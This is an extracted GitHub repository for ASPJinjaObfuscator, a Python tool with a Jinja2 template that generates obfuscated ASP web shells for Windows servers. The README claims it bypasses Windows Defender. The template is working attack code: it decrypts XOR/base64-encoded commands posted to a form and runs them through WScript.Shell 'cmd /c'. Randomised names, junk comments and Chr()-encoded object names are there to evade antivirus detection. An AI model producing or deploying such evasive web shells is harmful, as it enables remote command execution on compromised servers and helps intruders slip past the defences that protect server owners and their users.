Repository: fin3ss3g0d/ASPJinjaObfuscator
Branch: main
Commit: 57021a9afcd8
Files: 5
Total size: 15.5 KB
Directory structure:
gitextract_pkpz65n_/
├── LICENSE.md
├── README.md
├── asp-jinja-obfuscator.py
├── requirements.txt
└── shell.py.j2
================================================
FILE CONTENTS
================================================
================================================
FILE: LICENSE.md
================================================
MIT License
Copyright (c) 2024 Dylan Evans
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
================================================
FILE: README.md
================================================
# ASPJinjaObfuscator
A heavily obfuscated `Windows` based `ASP` web shell generation tool utilizing the power of Python's `Jinja2` templating engine. Generates a web shell with randomized variable/function names and HTML strings of random lengths, XOR encrypted strings with base64 encoding, a random amount of newlines, a random amount of `VBScript/HTML` comments with a random amount of random strings, and a random encryption key per generation. Tested as bypassing the latest version of `Windows Defender` as of `04/22/2024` with `Cloud-delivered protection` enabled.
## Installation
Make sure that you have `Python3` with the `Jinja2` & `pyperclip` `pip` packages installed. Install the `pip` requirements with the following command:
```bash
pip3 install -r requirements.txt
```
## Usage
Run the program with no commandline arguments from the directory where the script and the `Jinja2` template is installed, it will then generate a randomized web shell named `output.asp`. The program will ask you what commands you would like to run, type them into the program in plaintext and it will give you the encrypted versions. It will automatically copy them to the clipboard, paste these encrypted commands into the web shell, it will decrypt and then run them. That's it, time to **PROFIT**!
================================================
FILE: asp-jinja-obfuscator.py
================================================
import random
import string
import base64
import pyperclip
from jinja2 import Environment, FileSystemLoader
def random_string():
length = random.randint(5, 100) # Generate a random length between 5 and 100
return ''.join(random.choice(string.ascii_letters) for _ in range(length))
def xor_encrypt(data, key):
return ''.join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(data))
def encode_base64(data):
return base64.b64encode(data.encode()).decode()
def render_template(template_name, **kwargs):
env = Environment(loader=FileSystemLoader('./'))
template = env.get_template(template_name)
return template.render(**kwargs)
def add_random_newlines(template, max_newlines=5):
"""
Adds random newlines to a given template string at the end of lines to avoid breaking the code.
:param template: str - The original multiline template string.
:param max_newlines: int - The maximum number of newlines to add.
:return: str - The mutated template string with newlines added.
"""
# Split the template into lines
lines = template.splitlines()
# Select random line indices to add newlines after them
newline_positions = sorted(random.sample(range(len(lines)), min(max_newlines, len(lines))))
# Add extra newlines to the selected lines
for index in newline_positions:
lines[index] += '\n' * random.randint(1, 50) # Add between 1 and 50 newlines
# Reassemble the template with the added newlines
return '\n'.join(lines)
def generate_comments(spaces_count, html_format=False):
"""
Generates random comment lines with a specified number of spaces prefixed,
each containing a random number of random strings. The format of the comments
can be either HTML or VBScript based on the html_format flag.
:param spaces_count: int - Number of spaces to prepend to each comment line.
:param html_format: bool - If True, returns HTML formatted comments, else VBScript comments.
:return: str - A string of one or more randomly generated comment lines.
"""
# Random number of comment lines to generate
number_of_comments = random.randint(1, 50)
# Generate the comment block
comment_block = ""
space_prefix = ' ' * spaces_count
for _ in range(number_of_comments):
# Random number of strings to generate per comment line
number_of_strings = random.randint(1, 20)
# Collect multiple random strings
comment_strings = ' '.join(random_string() for _ in range(number_of_strings))
if html_format:
comment_block += f"{space_prefix}<!-- {comment_strings} -->\n"
else:
comment_block += f"{space_prefix}' {comment_strings}\n"
return comment_block.strip()
def obfuscate_code(key):
# Find and replace all template variables
to_replace = {
'encryptedInput': random_string(),
'encryptedCommand': random_string(),
'decryptedCommand': random_string(),
'objShell': random_string(),
'objExecObject': random_string(),
'strOutput': random_string(),
'keyString': random_string(),
'tempDecodedString': random_string(),
'encryption_key': key,
'cmd_Decrypted': random_string(),
'WScript_Shell_Decrypted': random_string(),
'Base64Encode': random_string(),
'strText': random_string(),
'objXML': random_string(),
'objNode': random_string(),
'StringToBinary': random_string(),
'MultiByteToBinary': random_string(),
'arrData': random_string(),
'stream': random_string(),
'Base64Decode': random_string(),
'BinaryToString': random_string(),
'binaryVal': random_string(),
'objStream': random_string(),
'XORStrings': random_string(),
'input1': random_string(),
'input2': random_string(),
'char1': random_string(),
'char2': random_string(),
'xorValue': random_string(),
'result': random_string(),
'iterator': random_string(),
'base64DecodedCommand': random_string(),
'cmd': encode_base64(xor_encrypt("cmd /c ", key)),
'WScript_Shell': encode_base64(xor_encrypt("WScript.Shell", key)),
'Execute_Command': random_string(),
'Execute_Encrypted_Command': random_string(),
'Enter_Encrypted_Command': random_string(),
'inputSize': random.randint(5, 250),
'SubmitValue': random_string(),
'vbComment': generate_comments(0),
'vbComment4': generate_comments(4),
'vbComment8': generate_comments(8),
'vbComment12': generate_comments(12),
'htmlComment': generate_comments(0, html_format=True),
'htmlComment4': generate_comments(4, html_format=True),
'htmlComment8': generate_comments(8, html_format=True),
}
# Load the template and render it with the variables
obfuscated_code = render_template('shell.py.j2', **to_replace)
# Add random newlines to the obfuscated code
return add_random_newlines(obfuscated_code, 100)
def main():
key = random_string()
obfuscated_code = obfuscate_code(key)
with open("output.asp", "w") as output_file:
output_file.write(obfuscated_code)
while True:
command = input("Enter command to encrypt: ")
encrypted_command = encode_base64(xor_encrypt(command, key))
print(f"Encrypted: {encrypted_command}")
pyperclip.copy(encrypted_command)
print("Encrypted command copied to clipboard.")
if __name__ == "__main__":
main()
================================================
FILE: requirements.txt
================================================
Jinja2>=3.0
pyperclip>=1.8.2
================================================
FILE: shell.py.j2
================================================
<%
{{ vbComment }}
If Request.Form("{{ encryptedInput }}") <> "" Then
{{ vbComment4 }}
Dim {{ encryptedCommand }}, {{ decryptedCommand }}
{{ vbComment4 }}
Dim {{ objShell }}, {{ objExecObject }}, {{ strOutput }}
{{ vbComment4 }}
Dim {{ keyString }}, {{ tempDecodedString }}
{{ vbComment4 }}
Dim {{ cmd_Decrypted }}, {{ WScript_Shell_Decrypted }}
{{ vbComment4 }}
{{ keyString }} = "{{ encryption_key }}"
{{ vbComment4 }}
{{ tempDecodedString }} = {{ Base64Decode }}("{{ cmd }}")
{{ vbComment4 }}
{{ cmd_Decrypted }} = {{ XORStrings }}({{ tempDecodedString }}, {{ keyString }})
{{ vbComment4 }}
{{ tempDecodedString }} = {{ Base64Decode }}("{{ WScript_Shell }}")
{{ vbComment4 }}
{{ WScript_Shell_Decrypted }} = {{ XORStrings }}({{ tempDecodedString }}, {{ keyString }})
{{ vbComment4 }}
Function {{ Base64Encode }}({{ strText }})
{{ vbComment8 }}
Dim {{ objXML }}, {{ objNode }}
{{ vbComment8 }}
Set {{ objXML }} = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(68) & Chr(79) & Chr(77) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116))
{{ vbComment8 }}
Set {{ objNode }} = {{ objXML }}.createElement(Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52))
{{ vbComment8 }}
{{ objNode }}.dataType = Chr(98) & Chr(105) & Chr(110) & Chr(46) & Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52)
{{ vbComment8 }}
{{ objNode }}.nodeTypedValue = {{ StringToBinary }}({{ strText }})
{{ vbComment8 }}
{{ Base64Encode }} = {{ objNode }}.text
{{ vbComment8 }}
Set {{ objNode }} = Nothing
{{ vbComment8 }}
Set {{ objXML }} = Nothing
{{ vbComment8 }}
End Function
{{ vbComment4 }}
Function {{ StringToBinary }}({{ strText }})
{{ vbComment8 }}
Dim {{ arrData }}
{{ vbComment8 }}
{{ arrData }} = {{ MultiByteToBinary }}({{ strText }})
{{ vbComment8 }}
{{ StringToBinary }} = {{ arrData }}
{{ vbComment8 }}
End Function
{{ vbComment4 }}
Function {{ MultiByteToBinary }}({{ strText }})
{{ vbComment8 }}
Dim {{ stream }}
{{ vbComment8 }}
Set {{ stream }} = CreateObject(Chr(65) & Chr(68) & Chr(79) & Chr(68) & Chr(66) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109))
{{ vbComment8 }}
{{ stream }}.Type = 2
{{ vbComment8 }}
{{ stream }}.Charset = Chr(105) & Chr(115) & Chr(111) & Chr(45) & Chr(56) & Chr(56) & Chr(53) & Chr(57) & Chr(45) & Chr(49)
{{ vbComment8 }}
{{ stream }}.Open
{{ vbComment8 }}
{{ stream }}.WriteText {{ strText }}
{{ vbComment8 }}
{{ stream }}.Position = 0
{{ vbComment8 }}
{{ stream }}.Type = 1
{{ vbComment8 }}
{{ MultiByteToBinary }} = {{ stream }}.Read
{{ vbComment8 }}
{{ stream }}.Close
{{ vbComment8 }}
Set {{ stream }} = Nothing
{{ vbComment8 }}
End Function
{{ vbComment4 }}
Function {{ Base64Decode }}({{ strText }})
{{ vbComment8 }}
Dim {{ objXML }}, {{ objNode }}
{{ vbComment8 }}
Set {{ objXML }} = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(68) & Chr(79) & Chr(77) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116))
{{ vbComment8 }}
Set {{ objNode }} = {{ objXML }}.createElement(Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52))
{{ vbComment8 }}
{{ objNode }}.dataType = Chr(98) & Chr(105) & Chr(110) & Chr(46) & Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52)
{{ vbComment8 }}
{{ objNode }}.text = {{ strText }}
{{ vbComment8 }}
{{ Base64Decode }} = {{ BinaryToString }}({{ objNode }}.nodeTypedValue)
{{ vbComment8 }}
Set {{ objNode }} = Nothing
{{ vbComment8 }}
Set {{ objXML }} = Nothing
{{ vbComment8 }}
End Function
{{ vbComment4 }}
Function {{ BinaryToString }}({{ binaryVal }})
{{ vbComment8 }}
Dim {{ objStream }}
{{ vbComment8 }}
Set {{ objStream }} = CreateObject(Chr(65) & Chr(68) & Chr(79) & Chr(68) & Chr(66) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109))
{{ vbComment8 }}
{{ objStream }}.Type = 1
{{ vbComment8 }}
{{ objStream }}.Open
{{ vbComment8 }}
{{ objStream }}.Write {{ binaryVal }}
{{ vbComment8 }}
{{ objStream }}.Position = 0
{{ vbComment8 }}
{{ objStream }}.Type = 2
{{ vbComment8 }}
{{ objStream }}.Charset = Chr(105) & Chr(115) & Chr(111) & Chr(45) & Chr(56) & Chr(56) & Chr(53) & Chr(57) & Chr(45) & Chr(49)
{{ vbComment8 }}
{{ BinaryToString }} = {{ objStream }}.ReadText
{{ vbComment8 }}
{{ objStream }}.Close
{{ vbComment8 }}
Set {{ objStream }} = Nothing
{{ vbComment8 }}
End Function
{{ vbComment4 }}
Function {{ XORStrings }}({{ input1 }}, {{ input2 }})
{{ vbComment8 }}
Dim {{ result }}
{{ vbComment8 }}
Dim {{ iterator }}
{{ vbComment8 }}
Dim {{ char1 }}, {{ char2 }}, {{ xorValue }}
{{ vbComment8 }}
{{ result }} = ""
{{ vbComment8 }}
For {{ iterator }} = 1 To Len({{ input1 }})
{{ vbComment12 }}
{{ char1 }} = Asc(Mid({{ input1 }}, {{ iterator }}, 1))
{{ vbComment12 }}
{{ char2 }} = Asc(Mid({{ input2 }}, ({{ iterator }} - 1) Mod Len({{ input2 }}) + 1, 1))
{{ vbComment12 }}
{{ xorValue }} = {{ char1 }} Xor {{ char2 }}
{{ vbComment12 }}
{{ result }} = {{ result }} & Chr({{ xorValue }})
{{ vbComment12 }}
Next
{{ vbComment8 }}
{{ XORStrings }} = {{ result }}
{{ vbComment8 }}
End Function
{{ vbComment4 }}
{{ encryptedCommand }} = Request.Form("{{ encryptedInput }}")
{{ vbComment4 }}
{{ base64DecodedCommand }} = {{ Base64Decode }}({{ encryptedCommand }})
{{ vbComment4 }}
{{ decryptedCommand }} = {{ XORStrings }}({{ base64DecodedCommand }}, {{ keyString }})
{{ vbComment4 }}
Set {{ objShell }} = CreateObject({{ WScript_Shell_Decrypted }})
{{ vbComment4 }}
Set {{ objExecObject }} = {{ objShell }}.Exec({{ cmd_Decrypted }} & {{ decryptedCommand }})
{{ vbComment4 }}
{{ strOutput }} = {{ objExecObject }}.StdOut.ReadAll()
{{ vbComment4 }}
Set {{ objExecObject }} = Nothing
{{ vbComment4 }}
Set {{ objShell }} = Nothing
{{ vbComment4 }}
End If
{{ vbComment }}
%>
<html>
{{ htmlComment }}
<head>
{{ htmlComment }}
<title>{{ Execute_Command }}</title>
{{ htmlComment4 }}
</head>
{{ htmlComment }}
<body>
{{ htmlComment }}
<h2>{{ Execute_Encrypted_Command }}</h2>
{{ htmlComment4 }}
<form method="post">
{{ htmlComment8 }}
<label for="{{ encryptedInput }}">{{ Enter_Encrypted_Command }}</label><br>
{{ htmlComment8 }}
<input type="text" id="{{ encryptedInput }}" name="{{ encryptedInput }}" size="{{ inputSize }}"><br><br>
{{ htmlComment8 }}
<input type="submit" value="{{ SubmitValue }}">
{{ htmlComment8 }}
</form>
{{ htmlComment4 }}
<% If Request.Form("{{ encryptedInput }}") <> "" Then %>
{{ htmlComment8 }}
<pre><%={{ strOutput }}%></pre>
{{ htmlComment8 }}
<% End If %>
{{ htmlComment4 }}
</body>
{{ htmlComment }}
</html>
gitextract_pkpz65n_/ ├── LICENSE.md ├── README.md ├── asp-jinja-obfuscator.py ├── requirements.txt └── shell.py.j2
SYMBOL INDEX (8 symbols across 1 files) FILE: asp-jinja-obfuscator.py function random_string (line 7) | def random_string(): function xor_encrypt (line 11) | def xor_encrypt(data, key): function encode_base64 (line 14) | def encode_base64(data): function render_template (line 17) | def render_template(template_name, **kwargs): function add_random_newlines (line 22) | def add_random_newlines(template, max_newlines=5): function generate_comments (line 43) | def generate_comments(spaces_count, html_format=False): function obfuscate_code (line 74) | def obfuscate_code(key): function main (line 131) | def main():
Condensed preview — 5 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (17K chars).
[
{
"path": "LICENSE.md",
"chars": 1067,
"preview": "MIT License\n\nCopyright (c) 2024 Dylan Evans\n\nPermission is hereby granted, free of charge, to any person obtaining a cop"
},
{
"path": "README.md",
"chars": 1325,
"preview": "# ASPJinjaObfuscator\n\n\n\nA heavily obfuscated `Windows` based `ASP` web shell generation tool uti"
},
{
"path": "asp-jinja-obfuscator.py",
"chars": 5649,
"preview": "import random\nimport string\nimport base64\nimport pyperclip\nfrom jinja2 import Environment, FileSystemLoader\n\ndef random_"
},
{
"path": "requirements.txt",
"chars": 28,
"preview": "Jinja2>=3.0\npyperclip>=1.8.2"
},
{
"path": "shell.py.j2",
"chars": 7785,
"preview": "<%\n{{ vbComment }}\nIf Request.Form(\"{{ encryptedInput }}\") <> \"\" Then\n {{ vbComment4 }}\n Dim {{ encryptedCommand }"
}
]
About this extraction
This page contains the full source code of the fin3ss3g0d/ASPJinjaObfuscator GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 5 files (15.5 KB), approximately 4.2k tokens, and a symbol index with 8 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.